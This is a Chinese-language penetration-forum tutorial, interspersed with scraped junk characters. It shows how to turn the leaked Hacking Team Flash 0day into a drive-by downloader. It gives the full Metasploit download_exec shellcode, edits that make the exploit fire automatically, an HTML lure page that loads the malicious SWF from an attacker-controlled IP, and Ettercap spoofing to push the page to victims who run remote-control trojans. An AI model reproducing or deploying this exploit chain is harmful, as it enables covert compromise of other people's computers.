三、flash 0day之手工代码修改制作下载者实例入侵演示 ^+ }" H( s! B$ f
$ \2 A9 w$ i7 Y3 A$ k: q6 @8 e; R利用到的工具: 9 P7 P, @8 v$ j* O" U, G
$ E5 ~/ J1 u& ^: E Msf
Ettercap * h+ P* Z# Q% w. R3 i0 C) @
% r$ y5 [. L5 J6 {; y7 @8 p4 }* q. J Adobe Flash CS6
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
4 g9 {+ g0 }# |" a: U E* L) E下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
y1 |. T! K- v! i1 \' Z# I# U5 u( X9 Z: N& {) u8 T, ~1 a2 F6 y 如图: - O9 B/ y# w' L
7 C. ?6 O; P2 ^4 e; U3 p6 `# |9 z/ ?( b6 \; p( b3 [6 ^1 s % U; h7 z0 @3 X: L8 [) d
4 |6 k4 \' U8 A6 J9 Q
8 o: j. x% Y5 Z2 J6 T' { 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
! X3 W w6 o ~, l% e
, E* X F4 U' Y G, D1 J
然后执行generate -t dword生成shellcode,如下:
% i( {" `3 P& K d: F- q
: o L) \7 |6 [# g 复制代码到文本下便于我们一会编辑flash exp,如下:
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, % z& }; D u9 K; n7 \2 x
6 F* M% T: p, Q5 C0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + x9 @( \7 ?7 [" g6 v
+ t# }4 `/ y5 v0 _: c: X! f6 ?- a3 ^1 E; x1 i4 V+ T 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 4 k6 p# ]9 Q5 Z
: n& p4 L6 P1 f: i9 G. Q4 e7 A1 q: F1 U( v8 E 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) k0 S+ v2 ]* h3 b. d
# s% H: P% y F* p$ M9 f$ ^$ T* i4 H; x; u) O3 z7 } 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
/ }& ~; W' h1 c' l" k2 D$ {0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 5 p% G4 o% w) i+ I
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! _8 c1 ~# W9 K0 q! a
- C$ P( B3 k. n8 @) U 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
5 B' U' u0 j/ ?5 {' |% q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 8 L: }+ r( L# `; {" ~
6 E/ d3 r* y9 @, U+ s1 O4 u! y0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 1 o' k! `; u7 [$ a
- F* K$ a6 {7 ^) Z* m/ Y; E2 B- y7 P! Z6 i: p4 F 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, & N( G" c6 a' Z5 \
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, + ~1 v8 a' c! T
( ` a4 w, w$ Z4 u0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
' H* G# h, E% C2 W7 j- g
/ \* i# A, E4 _. W7 u
& X C D* x0 G/ v0 R9 M _& {3 x下面我们来修改flash 0day exp,需要修改三个文件,分别为:
先修改ShellWin32.as,部分源代码如图: 2 [# j! @. a( }+ u! x: I' \* P% u
0 h5 \+ i8 L9 A; S; S5 B) e% z' g; U- O& N5 \
& r' A2 ~9 \3 r/ c1 p3 b 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
, |+ N) Y% J# A# f; x* u' @$ W# D8 K# O
9 G4 a% \3 B/ z4 ~/ z: H h 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
! t: l- m0 ~6 H7 Z( E7 I% c0 v8 k$ p4 J/ t/ G) ?; I
5 l' @! @1 Z3 j x4 ?4 \ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ( q( \6 |7 y J. c& Y9 S9 Z0 d. T
! ~" E$ {% T9 Z: S2 U7 r: O1 _ & G7 P0 u5 f, I0 f6 ~- C6 V0 s7 F
6 b' _" _9 x" r) |& V1 Z0 G0 X- F0 O- i$ \
- }5 g' E% X+ p; s! a 然后点保存,下面我们来编译一下,打开
, Y& Q" z, a2 A1 z( g, B# M) B/ F1 B! F |7 ?3 O! M9 Y exp1.fla然后点文件-发布,看看编译没错误
7 K; o$ d* [! \. A' Z& [8 l7 h) d# j! V, s" F; {; c0 b
. t7 ~, q; N5 k" [ 8 |+ F! D5 D" {" E! K0 _
, X! j; i) b0 j$ u, W( }3 O, o8 D1 F1 P+ P4 R$ ]: S $ w+ O8 o9 q) P. q' d
s& k7 H8 O# |5 w- M6 t0 s) P6 S8 `# ]2 Z7 P- m/ @+ P k% ?; ~
. \ L! |3 z& y- ] 然后我们把生成的
* v# K% v9 z; \) q8 ^; @( I4 v* jexp1.swf丢到kailinux 的/var/www/html下:
; H' O& z2 P7 r! U3 e# J 然后把这段代码好好编辑一下
2 S7 e `0 v8 H% y7 ~
7 {: [+ o0 t* U3 P- [( g6 C* F( L" @3 U, X: ]( S9 B7 [- \ 2 E0 A. f4 T- c# B, T
! }( r6 I3 l8 O1 G& Z
( E" m6 N' t- @, c% l- T / r) ^: ? A( r# G0 I1 O
; W' _7 U! j# p$ {
) f: Z4 m! A) T" L
<!DOCTYPE html>
z; K7 l( S1 Y# k) d% Z( K; t/ P: {; `+ E$ U2 h# B+ z j' p/ Z7 D Y <html>
z. t+ _, _& @8 e1 e2 [1 e4 K; ~" e7 @8 _; p) k d9 d <head> 2 X# M/ M, m$ v: C
<meta http-equiv="Content-Type" content="text/html;
- a( I. W- A$ {) \7 qcharset=utf-8"/>
$ b3 e5 N3 T! Z3 x' I6 z0 [8 d5 e2 M4 S$ Q </head>
' Q) V! i5 b) T* B% l* e0 G9 X( x2 c( f! @3 Y <body>
7 M# n) _9 Q" G u, K2 y<h2> Please wait, the requested page is loading...</h2>
Q2 W2 ?, h2 @, M3 q<br> % N9 n k* i+ U" U$ @
<OBJECT
6 h- p% o2 U, \2 u9 c
classid="clsid
27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
5 H4 i/ o. B7 }, j3 g4 R) O VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) }+ g8 Y) |9 X% M4 }+ T0 a; ~
. x: R$ s* v" m </body> 8 J# ~( N# I9 X% x5 R' M
3 t* s' V f9 Y2 X) }. j$ V$ X<script>
* m! c% @& T4 Q! f& s setTimeout(function () {
window.location.reload();
}, 10000); p( T$ n9 p- k1 V. O3 Y
' m* f; {* c: W8 Y : u6 M1 v2 Z: O( T) ^8 T
</script> # Z* H* ]: v$ J7 a) C. p2 @3 w
# C) I. I m" g3 p/ N8 X9 B$ }</html>
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) j8 k# ^, f7 }) m( a9 V
0 l& Q/ f. l2 R' }3 B% X
5 O' O+ K/ X# w# {
. j3 L% M! I; ? ! F7 n& q/ D5 M; p9 I
1 O9 ^5 j8 d: j% W# f# J2 G S ; _1 T- z: i# L% G+ L$ i5 U% D
! z5 K2 b6 G, b( J5 b: L; ~4 f' U. R6 E0 p ) v/ |& W5 {+ Q- I) u
* Y' H3 O' G* Y" S% W3 r. u4 \1 J$ f3 b# w; }3 P
; [. P/ {* b' ch% O3 H, j8 U$ P 下面我们用ettercap欺骗如图: ! K$ H% r! \, u+ O+ J/ I6 a7 a) G
1 ^2 O' V5 M* s, e( D8 ^4 V+ w, N9 ^1 B% _- w% c- ]
* O3 e* F5 K. g- e6 S U
. h4 I* A7 t; G2 d: p% p, m. ]
e$ z j6 Q- x( i 下面我们随便访问个网站看看: 7 g; z* {5 ~* W. A% E$ p
; D4 x! v8 `! X, ` 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
我们看另一台,
5 A4 S( v# @7 Z4 @9 S
提示这个错误,说明木马是成功被下载执行了,
只是由于某些原因没上线而已。。。 h4 i" m3 J+ _% X$ `2 @, f0 Q
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |